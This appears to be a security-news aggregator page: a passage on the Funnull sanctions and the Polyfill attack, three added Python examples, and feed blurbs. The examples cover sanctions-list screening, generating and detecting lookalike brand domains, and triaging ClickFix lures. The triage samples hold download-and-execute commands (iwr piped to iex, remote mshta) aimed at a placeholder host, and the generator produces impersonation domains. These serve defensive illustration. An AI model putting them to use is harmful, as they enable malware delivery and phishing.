Rasch said financial institutions have very mature systems for severing accounts tied to people who become subject to OFAC sanctions, but that tech companies may be far less proactive — particularly with free accounts.

“Banks have established ways of checking [U.S. government sanctions lists] for sanctioned entities, but tech companies don’t necessarily do a good job with that, especially for services that you can just click and sign up for,” Rasch said. “It’s potentially a risk and liability for the tech companies involved, but only to the extent OFAC is willing to enforce it.”

[Image caption: Liu Lizhi operates numerous Facebook accounts and groups, including this one for an entity specified in the OFAC sanctions: The “Enjoy Ganzhou” tourism page for Ganzhou, China. Image: Silent Push.]
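Rasch’s point above (banks screen against the sanctions list; click-to-sign-up services often do not) as an added example of what a basic screen of new accounts against a listing’s stated names, nicknames and e-mail addresses looks like. This is added here and is not code from the article, Silent Push, GitHub, Meta or any other party named in it. The watchlist entries, the sign-up records and the matching rules are constructed assumptions, not real listing data and not any provider’s process. It goes slightly beyond the text in also flagging a handle that merely embeds a listed nickname, since that is the shape of the reuse the article describes (a platform username that is itself a listed nickname).

```python
"""Screening sign-up records against a sanctions-style alias list.

Added example for this page, not code from the article or from any platform
it names. WATCHLIST and SIGNUPS are constructed placeholders (assumption), and
the matching rules are a minimal illustration of one way to do the check, not
a description of any real provider's process.
"""
import re
import unicodedata
from dataclasses import dataclass, field


@dataclass
class WatchlistEntry:
    """One listed party: the primary name plus the aliases, handles and
    e-mail addresses the listing spells out."""
    list_id: str
    name: str
    aliases: list[str] = field(default_factory=list)
    emails: list[str] = field(default_factory=list)


def normalize(text: str) -> str:
    """Fold case, strip accents and punctuation so 'Liu-Lizhi', 'liu lizhi'
    and 'LIU  LIZHI' compare equal. '@' and '.' survive so e-mails keep shape."""
    text = unicodedata.normalize("NFKD", text)
    text = "".join(c for c in text if not unicodedata.combining(c))
    text = re.sub(r"[^a-z0-9@.\s]", " ", text.casefold())
    return " ".join(text.split())


def handle_key(text: str) -> str:
    """Handle form: '@Nice_Lizhi', 'nicelizhi' and 'nice lizhi' all collide."""
    return normalize(text).lstrip("@").replace(" ", "").replace(".", "")


def build_index(entries: list[WatchlistEntry]) -> dict[str, set[str]]:
    """Map each normalized name, alias, handle form and e-mail to the
    list_id(s) that carry it."""
    index: dict[str, set[str]] = {}
    for e in entries:
        keys = {normalize(e.name), handle_key(e.name)}
        for a in e.aliases:
            keys |= {normalize(a), handle_key(a)}
        keys |= {normalize(m) for m in e.emails}
        for k in keys:
            if k:
                index.setdefault(k, set()).add(e.list_id)
    return index


def screen_account(account: dict, index: dict[str, set[str]]) -> list[str]:
    """Return sorted list_ids hit by one sign-up record.

    Hits: exact normalized match on display name or e-mail, exact match on
    the handle form, or a handle that embeds a listed handle of 6+ chars
    (so 'nicelizhi2024' still surfaces, but a 4-char alias does not hit everything)."""
    hits: set[str] = set()
    hits |= index.get(normalize(account.get("display_name", "")), set())
    hits |= index.get(normalize(account.get("email", "")), set())
    hk = handle_key(account.get("handle", ""))
    for key, ids in index.items():
        if " " in key or "@" in key:
            continue  # only handle-shaped keys take part in substring matching
        if hk and (hk == key or (len(key) >= 6 and key in hk)):
            hits |= ids
    return sorted(hits)


# Constructed placeholder listing (assumption): no real names or list data.
WATCHLIST = [
    WatchlistEntry("EX-0001", "Jane Example",
                   aliases=["JaneEx", "NiceExample", "XL4J"],
                   emails=["jane.example@example.com"]),
    WatchlistEntry("EX-0002", "Acme Tourism Page", aliases=["EnjoyAcmeville"]),
]
INDEX = build_index(WATCHLIST)

# Constructed sign-up records (assumption) of the kind a click-to-register
# service sees; one is clean, the others reuse a listed name, handle or e-mail.
SIGNUPS = [
    {"display_name": "Jane Example", "handle": "@jane_ex", "email": "j@example.org"},
    {"display_name": "J. E.", "handle": "NiceExample2024", "email": "x@example.org"},
    {"display_name": "Someone", "handle": "s1", "email": "Jane.Example@Example.com"},
    {"display_name": "Travel Fan", "handle": "enjoy-acmeville", "email": "t@example.org"},
    {"display_name": "Bob Builder", "handle": "bobb", "email": "bob@example.org"},
]


def screen_all(signups=SIGNUPS, index=INDEX) -> dict[str, list[str]]:
    """Handle -> hits for every record; an empty list means no listed match."""
    return {s["handle"]: screen_account(s, index) for s in signups}


if __name__ == "__main__":
    for handle, hits in screen_all().items():
        print(f"{handle:18} {'HIT ' + ','.join(hits) if hits else 'clear'}")
```

The substring rule is deliberately one-directional (listed handle inside the new handle, never the reverse) and has a length floor; without both, short aliases would light up every account and the screen would be ignored. Anything this flags still needs a human review step, since a normalized name match is evidence, not proof, of identity.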
In July 2024, Funnull purchased the domain polyfill[.]io, the longtime home of a legitimate open source project that allowed websites to ensure that devices using legacy browsers could still render content in newer formats. After the Polyfill domain changed hands, at least 384,000 websites were caught in a supply-chain attack that redirected visitors to malicious sites. According to the Treasury, Funnull used the code to redirect people to scam websites and online gambling sites, some of which were linked to Chinese criminal money laundering operations.

The U.S. government says Funnull provides domain names for websites on its purchased IP addresses, using domain generation algorithms (DGAs) — programs that generate large numbers of similar but unique names for websites — and that it sells web design templates to cybercriminals.

“These services not only make it easier for cybercriminals to impersonate trusted brands when creating scam websites, but also allow them to quickly change to different domain names and IP addresses when legitimate providers attempt to take the websites down,” reads a Treasury statement.

Meanwhile, Funnull appears to be morphing nearly all aspects of its business in the wake of the sanctions, Edwards said.

“Whereas before they might have used 60 DGA domains to hide and bounce their traffic, we’re seeing far more now,” he said. “They’re trying to make their infrastructure harder to track and more complicated, so for now they’re not going away but more just changing what they’re doing. And a lot more organizations should be holding their feet to the fire.”

Update, 2:48 PM ET: Added response from Meta, which confirmed it has closed the accounts and groups connected to Mr. Lizhi.
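The Treasury description above (algorithmically generated, brand-impersonating names that can be rotated faster than takedowns) as an added example: a seed-driven generator of that kind of lookalike name, beside a detector that folds the usual confusable substitutions before comparing a domain against a protected-brand list. This is added here and is not code from the article, Silent Push, Treasury or Funnull; the brand list, lure words, TLDs and substitution tables are constructed assumptions, and no actual Funnull output is reproduced. The detector goes beyond the single mechanism in the text by also catching plain typo-squats (one edit or transposition away from the brand), since a practitioner checking newly seen domains wants both.

```python
"""Brand-impersonation domains: a seed-driven generator of the kind the
Treasury statement describes, and a detector that folds the usual confusable
substitutions before comparing against a protected brand list.

Added example for this page, not code from the article, Silent Push, Treasury
or Funnull. BRANDS, WORDS, TLDS and the substitution tables are constructed
assumptions; real Funnull/DGA output is not reproduced here.
"""
import hashlib
import re
from typing import Optional

# Constructed protected-brand list (assumption): brand token -> its legitimate domains.
BRANDS = {
    "examplebank": {"examplebank.com"},
    "acmepay": {"acmepay.com", "acmepay.net"},
}
WORDS = ["login", "verify", "secure", "support", "billing"]   # lure words (assumption)
TLDS = ["com", "top", "xyz", "shop"]                           # assumption
SUBS = {"l": "1", "o": "0", "e": "3", "s": "5"}                # generator's confusables
FOLD = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s"}  # detector's inverse


def generate_variants(brand: str, seed: str, n: int) -> list[str]:
    """Deterministically derive n unique brand-themed lookalikes from (seed, brand).
    Each candidate: brand with some confusable swaps + optional '-' + lure word + TLD.
    Re-running with the same seed reproduces the list, which is what lets an
    operator and their site templates agree on the current batch of names."""
    out: list[str] = []
    i = 0
    while len(out) < n and i < 10_000:
        h = hashlib.sha256(f"{seed}:{brand}:{i}".encode()).digest()
        i += 1
        chars = list(brand)
        for pos, c in enumerate(chars):
            if c in SUBS and h[2 + pos % 28] % 3 == 0:
                chars[pos] = SUBS[c]
        sep = "-" if h[31] % 2 else ""
        dom = f"{''.join(chars)}{sep}{WORDS[h[0] % len(WORDS)]}.{TLDS[h[1] % len(TLDS)]}"
        if dom not in out:
            out.append(dom)
    return out


def fold_confusables(label: str) -> str:
    """Undo common look-alike substitutions, then keep letters only.
    Heuristic: 'rn'->'m' will also mangle honest words such as 'learn'."""
    for src, dst in FOLD.items():          # multi-char rules first (dict order)
        label = label.replace(src, dst)
    return re.sub(r"[^a-z]", "", label)


def registrable_label(domain: str) -> str:
    """Second-level label. Assumption: no Public Suffix List handling, so
    'x.co.uk' would yield 'co'; a real deployment should consult the PSL."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so a typo-squat like 'exampel' sits one step from 'example'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(domain: str, brands: dict = BRANDS) -> tuple[str, Optional[str]]:
    """('legit', brand) for a brand's own domains and their subdomains,
    ('impersonation', brand) when the folded label embeds a brand token or is
    within one edit of it, else ('unknown', None)."""
    domain = domain.lower().strip(".")
    for brand, legit in brands.items():
        if domain in legit or any(domain.endswith("." + d) for d in legit):
            return ("legit", brand)
    label = fold_confusables(registrable_label(domain))
    for brand in brands:
        if brand in label:
            return ("impersonation", brand)
    for brand in brands:
        if osa_distance(label, brand) <= 1:
            return ("impersonation", brand)
    return ("unknown", None)


if __name__ == "__main__":
    for dom in generate_variants("examplebank", "2025-07", 5) + ["examplebank.com", "acrnepay.xyz"]:
        print(f"{dom:32} {classify(dom)}")
```

Because the generator only ever swaps characters the detector folds back, every name it emits classifies as impersonation; in practice the gap to close is the fold table and the brand list, not the matching logic, and the registrable-label shortcut must be replaced with a Public Suffix List lookup before this is pointed at real DNS data.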

 Feed

Cisco has released security updates to address a maximum-severity security flaw in Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME) that could permit an attacker to log in to a susceptible device as the root user, allowing them to gain elevated privileges. The vulnerability, tracked as CVE-2025-20309, carries a CVSS score

 Feed

Cybersecurity researchers have uncovered over 40 malicious browser extensions for Mozilla Firefox that are designed to steal cryptocurrency wallet secrets, putting users' digital assets at risk. "These extensions impersonate legitimate wallet tools from widely-used platforms such as Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, MyMonero, Bitget, Leap, Ethereum Wallet, and Filfox

 Feed

If you’re evaluating AI-powered SOC platforms, you’ve likely seen bold claims: faster triage, smarter remediation, and less noise. But under the hood, not all AI is created equal. Many solutions rely on pre-trained AI models that are hardwired for a handful of specific use cases. While that might work for yesterday’s SOC, today's reality is different. Modern security operations teams face a

 Feed

The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected at the beginning of

 Feed

A mobile ad fraud operation dubbed IconAds that consisted of 352 Android apps has been disrupted, according to a new report from HUMAN. The identified apps were designed to load out-of-context ads on a user's screen and hide their icons from the device home screen launcher, making it harder for victims to remove them, per the company's Satori Threat Intelligence and Research Team. The apps have

 Law & order

A Mexican drug cartel spies on the FBI using traffic cameras and spyware — because “ubiquitous technical surveillance” is no longer just for dystopian thrillers. Graham digs into a chilling new US Justice Department report that shows how surveillance tech was weaponised to deadly effect. Meanwhile, Carole checks the rear-view mirror on the driverless car industry. Whatever happened to those million Tesla robotaxis Elon Musk promised by 2020? Spoiler: they’re here — sort of — but they sometimes drive into oncoming traffic. Plus: Leighton House, heatwave survival gadgets, and an unflushable toilet situation (not what you think). All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

 Cyber Security News

Source: thehackernews.com. Threat actors with ties to North Korea have been observed targeting Web3 and cryptocurrency-related businesses with malware written in the Nim programming language, underscoring a constant evolution of their tactics. “Unusually for macOS malware, the threat actors employ a process injection technique and remote communications via wss, the TLS-encrypted version […] The post “North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com. With nearly 80% of cyber threats now mimicking legitimate user behavior, how are top SOCs determining what’s legitimate traffic and what is potentially dangerous? Where do you turn when firewalls and endpoint detection and response (EDR) fall short at detecting the most important threats to your organization? Breaches at edge […] The post “That Network Traffic Looks Legit, But it Could be Hiding a Serious Threat” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com. Cybersecurity researchers are calling attention to phishing campaigns that impersonate popular brands and trick targets into calling phone numbers operated by threat actors. “A significant portion of email threats with PDF payloads persuade victims to call adversary-controlled phone numbers, displaying another popular social engineering technique known as Telephone-Oriented Attack Delivery […] The post “Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com. Cisco Spaces Connector Privilege Escalation Vulnerability (Medium; CVE-2025-20308; CWE-78). Summary: A vulnerability in Cisco Spaces Connector could allow an authenticated, local attacker to elevate privileges and execute arbitrary commands on the underlying operating system as root. This vulnerability is due to insufficient restrictions during the execution of […] The post “Cisco Spaces Connector Privilege Escalation Vulnerability” (Source: sec.cloudapps.cisco.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com. Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability (Medium; CVE-2025-20307; CWE-79). Summary: A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due […] The post “Cisco BroadWorks Application Delivery Platform Cross-Site Scripting Vulnerability” (Source: sec.cloudapps.cisco.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Amy Bunn. Whether it tags along via a smartphone, laptop, tablet, or wearable, it seems like the internet follows us wherever we go nowadays. Yet there’s something else that follows us around as well — a growing body of personal info that we create while banking, shopping, and simply browsing the […] The post “How to Protect Your Personal Info” (Source: www.mcafee.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: McAfee Labs. Authored by: M, Mohanasundaram and Neil Tyagi. In today’s rapidly evolving cyber landscape, malware threats continue to adapt, employing new tactics and leveraging popular platforms to reach unsuspecting victims. One such emerging threat is the Lumma Stealer, a potent information-stealing malware recently gaining traction through Telegram channels. With Telegram’s popularity […] The post “Lumma Stealer on the Rise: How Telegram Channels Are Fueling Malware Proliferation” (Source: www.mcafee.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. How do you recognize phishing emails and texts? Even as many of the scammers behind them have made their attacks more sophisticated, you can still pick out telltale signs. What they all have in common: every phishing attempt is a cybercrime that aims to steal your sensitive info. Personal info. Financial info. Other attacks […] The post “How to Recognize a Phishing Email” (Source: www.mcafee.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. You consider yourself a responsible person when it comes to taking care of your physical possessions. You’ve never left your wallet in a taxi or lost an expensive ring down the drain. You never let your smartphone out of your sight, yet one day you notice it’s acting oddly. Did you know that your device […] The post “How to Protect Your Smartphone from SIM Swapping” (Source: www.mcafee.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com. If you’re evaluating AI-powered SOC platforms, you’ve likely seen bold claims: faster triage, smarter remediation, and less noise. But under the hood, not all AI is created equal. Many solutions rely on pre-trained AI models that are hardwired for a handful of specific use cases. While that might work for […] The post “The Hidden Weaknesses in AI SOC Tools that No One Talks About” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Chinese

Source: thehackernews.com. The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected […] The post “Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Critical

Source: thehackernews.com. Cisco has released security updates to address a maximum-severity security flaw in Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME) that could permit an attacker to log in to a susceptible device as the root user, allowing them to gain elevated privileges. The vulnerability, […] The post “Critical Cisco Vulnerability in Unified CM Grants Root Access via Static Credentials” (Source: thehackernews.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Compliance

Source: www.csoonline.com. If third-party providers violate regulations, they expose their clients to a compliance risk. Third-party risk management (TPRM) is intended to help against this. Whether your organization is aware of it or not, it does rely on third-party service providers that help to make business processes more effective and efficient. However, working with third […] The post “Third-party risk management: How to avoid compliance disaster” (Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com. The German federal government holds Russia responsible for online disinformation. (Image: Skorzewiak – shutterstock.com) The federal government holds Russia responsible for disinformation that is being spread via a media platform operating out of Turkey. Moscow is deliberately using the platform “Red.”, which is registered there, for information manipulation, a spokesperson for the Federal Foreign Office in Berlin said. The aim is […] The post “Russland nutzt Medienplattform für Desinformation” (“Russia uses media platform for disinformation”; Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cloud Security

Source: www.csoonline.com. From inadequate visibility to access management complexity, multicloud environments take baseline cloud security issues to another level. A multicloud environment is now standard for midsize and large organizations, with tech leaders opting to use multiple cloud providers for the improved flexibility, resiliency, and additional advantages that operating in multiple clouds brings. […] The post “5 multicloud security challenges — and how to address them” (Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 cryptocurrency

Source: www.csoonline.com. News, Jul 2, 2025, 4 min read. Tags: Cryptocurrency, MacOS Security, Malware. Researchers warn that recent attack campaigns against Web3 and crypto startups by a North Korean APT group have leveraged a new family of malware written in the niche programming language Nim. North Korean threat actors are targeting companies from the Web3 and crypto industries with […] The post “North Korean crypto thieves deploy custom Mac backdoor” (Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com. News, Jul 2, 2025, 4 min read. Tags: Cyberattacks, Social Engineering. Less understood than phishing, the social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt is running riot. Incidents of ClickFix — the social engineering attack technique that tricks users into executing malicious code — […] The post “Sixfold surge of ClickFix attacks threatens corporate defenses” (Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.
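The technique in the CSO Online item above (a lure that gets the user to paste a command into PowerShell or the Run prompt) as an added example of the triage a responder can run over Run-box history and process command lines. This is not code from CSO Online or from any vendor it cites. The indicator patterns (encoded PowerShell, mshta fetching a remote file, a download piped into Invoke-Expression, a hidden window, a “verification” comment tacked onto the command) are this example’s assumptions about what such pasted commands commonly look like, the sample entries are constructed rather than real telemetry, and the trailing `\1` marker on RunMRU values is treated as an assumption about the exported registry format.

```python
"""Triage of Run-box history and process command lines for ClickFix-style lures.

Added example for this page, not code from CSO Online or any vendor it cites.
The indicator patterns are this editor's assumptions about what such lures
typically paste; the sample entries are constructed, not real telemetry.
"""
import base64
import binascii
import re
from typing import Optional

B64 = r"[A-Za-z0-9+/=]{20,}"
ENC_FLAG = rf"-(?:e|ec|enc|encodedcommand)\s+({B64})"

# (indicator name, pattern); order here is the order indicators are reported in.
PATTERNS = [
    ("encoded_powershell", re.compile(rf"powershell(?:\.exe)?\b.*?{ENC_FLAG}", re.I | re.S)),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+(?:https?:|\\\\)", re.I)),
    ("download_and_execute", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|curl|wget)\b.*?\|\s*(?:iex|invoke-expression)\b",
        re.I | re.S)),
    ("hidden_window", re.compile(r"-(?:w|windowstyle)\s+hidden\b", re.I)),
    ("conhost_headless", re.compile(r"conhost(?:\.exe)?\s+--headless\b", re.I)),
    ("verification_comment", re.compile(r"#\s*(?:i am not a robot|verification id|captcha|ray id)", re.I)),
]


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the UTF-16LE script behind PowerShell's -EncodedCommand, or None."""
    m = re.search(ENC_FLAG, cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def strip_runmru(value: str) -> str:
    """RunMRU values carry a trailing '\\1' marker (assumption about the exported
    format); drop it so it cannot interfere with matching."""
    return re.sub(r"\\1$", "", value.strip())


def triage(cmd: str) -> dict:
    """Score one command line. Reports matched indicator names; if the line
    carries an -EncodedCommand payload, the decoded script is scanned too and
    its hits are prefixed 'decoded:'. Score 0 means nothing matched."""
    cmd = strip_runmru(cmd)
    indicators = [name for name, rx in PATTERNS if rx.search(cmd)]
    decoded = decode_encoded_command(cmd)
    if decoded:
        indicators += [f"decoded:{name}" for name, rx in PATTERNS if rx.search(decoded)]
    return {"command": cmd, "score": len(indicators), "indicators": indicators, "decoded": decoded}


def encode_powershell(script: str) -> str:
    """The -EncodedCommand form PowerShell expects (base64 over UTF-16LE).
    Used here only to construct a sample lure, not to run anything."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample entries (assumption), in the shape of RunMRU values and
# process-creation command lines. None of these are real observed lures.
SAMPLES = [
    r"notepad.exe\1",
    r"cmd /c ipconfig /all\1",
    "powershell -w hidden -enc " + encode_powershell("iwr http://example.invalid/a.ps1 | iex") + r"\1",
    r"mshta https://example.invalid/verify.hta # I am not a robot - Verification ID: 4172\1",
    r'conhost --headless powershell -c "irm http://example.invalid/x | iex"',
]


def triage_all(samples=SAMPLES) -> list[dict]:
    """Triage every sample; the caller decides the alerting threshold."""
    return [triage(s) for s in samples]


if __name__ == "__main__":
    for r in triage_all():
        print(f"score={r['score']} {r['indicators']}  {r['command'][:60]}")
```

Decoding the -EncodedCommand payload before scanning is the step that matters most: the visible Run-box entry for an encoded lure shows only a window flag and a base64 blob, and the download-and-execute pattern only appears once the UTF-16LE script is recovered.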

 CSOonline

Source: www.csoonline.com. Read about the problems that dependence on CVE currently creates and what options exist. If the CVE program were discontinued, assessing and remediating vulnerabilities would become harder. (Image: Dave Hoeek – shutterstock.com) The recent brief panic over the possible discontinuation of the Common Vulnerabilities and Exposures (CVE) program has [highlighted] the strong […] The post “Auf der Suche nach Alternativen zum CVE-Programm” (“In search of alternatives to the CVE program”; Source: www.csoonline.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.schneier.com – Author: Bruce Schneier. Once you build a surveillance system, you can’t control who will use it: A hacker working for the Sinaloa drug cartel was able to obtain an FBI official’s phone records and use Mexico City’s surveillance cameras to help track and kill the agency’s informants in 2018, according to a […] The post “Surveillance Used by a Drug Cartel” (Source: www.schneier.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. As Amazon Prime Day approaches (July 8-11, 2025), millions of shoppers are gearing up for what promises to be one of the biggest online shopping events of the year. But while you’re hunting for deals, cybercriminals may be hunting for you. A recent devastating case from Montana serves as […] The post “How to Shop Safely During Amazon Prime Day” (Source: www.mcafee.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com. Cisco Duo Self-Service Portal Command Injection Vulnerability (Medium; CVE-2025-20258; CWE-77). Summary: A vulnerability in the self-service portal of Cisco Duo could allow an unauthenticated, remote attacker to inject arbitrary commands into emails that are sent by the service. This vulnerability is due to insufficient input validation. An […] The post “Cisco Duo Self-Service Portal Command Injection Vulnerability” (Source: sec.cloudapps.cisco.com) first appeared on CISO2CISO.COM & CYBER SECURITY GROUP.

Aggregator history: Thursday, July 03, 2025 (2025-07)